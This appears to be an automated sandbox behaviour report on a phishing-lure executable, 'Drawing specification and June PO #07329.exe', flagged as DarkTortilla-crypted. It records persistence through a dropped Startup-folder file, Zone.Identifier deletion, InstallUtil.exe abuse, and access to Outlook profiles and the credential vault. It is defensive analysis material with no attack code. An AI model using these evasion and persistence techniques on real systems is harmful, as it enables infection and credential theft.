Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Drawing specification and June PO #07329.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Drawing specification and June PO #07329.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4082643908.0000000006172000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ source: file.exe, 0000000D.00000002.4062248332.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: file.exe, 0000000D.00000002.4084100623.0000000007B08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: file.exe, 0000000D.00000002.4062248332.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP.oLC:\Windows\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4061358219.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: file.exe, 0000000D.00000002.4082643908.0000000006172000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: file.exe, 0000000D.00000002.4084100623.0000000007B08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4084100623.0000000007B0F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3edfd50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.6610000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3edfd50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.6610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4674651066.0000000003973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2566518766.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2566518766.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 4052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR

.NET source code contains potential unpacker

Source: Drawing specification and June PO #07329.exe, Ft58Ac.cs	.Net Code: Qj09Nq System.Reflection.Assembly.Load(byte[])
Source: file.exe.7.dr, Ft58Ac.cs	.Net Code: Qj09Nq System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0144B0B0 push 0402D8C1h; ret	0_2_0144B145
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0144B3A8 push eax; iretd	0_2_0144B3B9
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D6039C push FFFFFFE9h; ret	0_2_07D6039F
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D600BE push esp; retf	0_2_07D600C1
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D99F08 push es; ret	0_2_07D99F42
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D9CCB5 push FFFFFF8Bh; iretd	0_2_07D9CCB7
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_08706960 push eax; iretd	0_2_08706961
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_08706320 push esp; retf	0_2_08706321
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B84769 push ebp; retf 0000h	12_2_00B8476A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B8B0B9 push 0400CAC1h; ret	12_2_00B8B145
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B8B3A8 push eax; iretd	12_2_00B8B3B9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06746320 push esp; retf	12_2_06746321
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0674CDD9 push eax; iretd	12_2_0674CDE5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06746960 push eax; iretd	12_2_06746961
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079C039C push FFFFFFE9h; ret	12_2_079C039F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CB3B6 push FFFFFFC3h; ret	12_2_079CB3F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079C00BE push esp; retf	12_2_079C00C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CC4DA push edx; iretd	12_2_079CC4DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CBA5B pushad ; ret	12_2_079CBA63
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A49D2B push FFFFFFC3h; ret	12_2_07A49D65
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4840F push es; ret	12_2_07A48420
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DBB0B0 push 040133C1h; ret	13_2_00DBB145
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DBB3A8 push eax; iretd	13_2_00DBB3B9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0039D push FFFFFFE9h; ret	13_2_07D0039F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0BA5A pushad ; ret	13_2_07D0BA63
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0C4DA push edx; iretd	13_2_07D0C4DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D000BE push esp; retf	13_2_07D000C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8840F push es; ret	13_2_07D88420
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FDC799 push 00000059h; ret	13_2_07FDC78E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FD6320 push esp; retf	13_2_07FD6321
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FD2F49 push FFFFFF8Bh; iretd	13_2_07FD2F5E

Source: Drawing specification and June PO #07329.exe, Nd40Rc.cs	High entropy of concatenated method names: 'a5QPt3', 't2W5Pq', 'Jm81Ef', 'Pm69Mb', 'b7HRs9', 'Yg2i5M', 'j2T5Wq', 'c5G7Hi', 'Bp71Zr', 'b8FRi7'
Source: file.exe.7.dr, Nd40Rc.cs	High entropy of concatenated method names: 'a5QPt3', 't2W5Pq', 'Jm81Ef', 'Pm69Mb', 'b7HRs9', 'Yg2i5M', 'j2T5Wq', 'c5G7Hi', 'Bp71Zr', 'b8FRi7'

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File created: \drawing specification and june po #07329.exe
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File created: \drawing specification and june po #07329.exe			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk

Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier:$DATA	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
